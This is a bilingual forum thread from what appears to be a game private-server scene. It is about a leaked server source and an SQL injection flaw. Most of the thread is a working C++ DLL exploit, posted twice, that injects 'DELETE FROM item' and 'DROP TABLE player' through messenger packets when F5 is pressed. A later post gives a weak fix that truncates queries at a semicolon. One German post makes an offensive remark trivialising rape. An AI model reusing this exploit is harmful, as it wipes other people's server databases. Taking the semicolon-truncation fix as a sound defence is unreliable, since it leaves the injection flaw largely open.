I readed the whole code but not tested it. So, thats why i ask. Cuz sometimes is necesary to test a fix.
der src wurde auch nicht von der GF geklaut.Quote:
Die Leute, die den Source geklaut haben, sind auch frei :D.
Waren zwar nicht die GF Server, but who cares?
Jap, ist leider so. Um es jetzt mal ein wenig inhuman auszudrücken: Vergewaltige lieber jemanden, dafür sitzt man nicht so lange.Quote:
der src wurde auch nicht von der GF geklaut.
Wenn du den GF server down machst, liegt eine direkte Geschäftsschädigung vor ganz zu schweigen von Cyberkriminalität .. da versteht der deutsche Staat gar kein Spaß.
You can make a mix / loading DLL type which looks like this :D :Quote:
Dowload SQL injector ? Ii test server...
void Myfunction()
{
PyRun_SimpleString("import net");
PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DELETE FROM item; --\", \"ss\")");
PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DROP TABLE player; --\", \"ss\")");
MessageBoxA(NULL, "[SQL-Injection] Queries sent correctly!", "*** Exploit (Skype: sacadatt.amazon) ***", NULL);
}
void start_fuck_off()
{
C:
if (GetAsyncKeyState(VK_F5)) Myfunction();
goto C;
}
BOOL APIENTRY DLLSQL_INJECT(HMODUL mod, DWORD reason, LPVOID re)
{
FILE *f = fopen("Exploit.Readme.txt", "w");
fputs("Damn, you just fucked a server.\n\
Do not use it to harm a server!\n\nUse only to test for you if you fixed it!\n", f);
fclose(f);
if (reason == DLL_PROCESS_ATTACH) CreateThread(NULL, NULL, LPTHREAD_START_ROUTINE(start_fuck_off), NULL, NULL, NULL);
return TRUE;
}
Lol this is my code from [Only registered and activated users can see links. Click Here To Register...] ...Quote:
You can make a mix / loading DLL type which looks like this :D :
Code:void Myfunction_VegaS() { PyRun_SimpleString("import net"); PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DELETE FROM item; --\", \"ss\")"); PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DROP TABLE player; --\", \"ss\")"); MessageBoxA(NULL, "[SQL-Injection] Queries sent correctly!", "*** Killer Exploit (Skype: sacadatt.amazon) ***", NULL); }
Then to the fun begins:
Code:void start_fuck_off() { C: if (GetAsyncKeyState(VK_F5)) Myfunction_VegaS(); goto C; }
Code:BOOL APIENTRY DLLSQL_INJECT(HMODUL mod, DWORD reason, LPVOID re) { FILE *f = fopen("Exploit.Readme.txt", "w"); fputs("Damn, you just fucked a server.\n\ Do not use it to harm a server!\n\nUse only to test for you if you fixed it!\n", f); fclose(f); if (reason == DLL_PROCESS_ATTACH) CreateThread(NULL, NULL, LPTHREAD_START_ROUTINE(start_fuck_off), NULL, NULL, NULL); return TRUE; }
I would prefer a solution like this:
andCode:SQLMsg * DBManager::DirectQuery(const char * c_pszFormat, ...) { char szQuery[4096]; va_list args; va_start(args, c_pszFormat); vsnprintf(szQuery, sizeof(szQuery), c_pszFormat, args); va_end(args); std::string sQuery(szQuery); return m_sql_direct.DirectQuery(sQuery.substr(0, sQuery.find_first_of(";") == -1 ? sQuery.length() : sQuery.find_first_of(";")).c_str()); }
Code:void DBManager::Query(const char * c_pszFormat, ...) { char szQuery[4096]; va_list args; va_start(args, c_pszFormat); vsnprintf(szQuery, sizeof(szQuery), c_pszFormat, args); va_end(args); std::string sQuery(szQuery); m_sql.AsyncQuery(sQuery.substr(0,sQuery.find_first_of(";")==-1?sQuery.length(): sQuery.find_first_of(";")).c_str()); }